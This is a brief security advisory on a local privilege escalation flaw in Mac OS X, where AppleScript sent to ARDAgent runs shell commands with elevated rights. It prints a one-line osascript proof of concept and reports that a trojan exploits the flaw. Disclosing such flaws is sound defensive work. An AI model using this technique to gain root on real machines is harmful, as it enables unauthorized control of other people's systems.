Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability

Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability

The following exploit code is available:

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

NOTE: This issue is being exploited by the 'AppleScript.THT' trojan to gain elevated privileges. Please see the references for more information.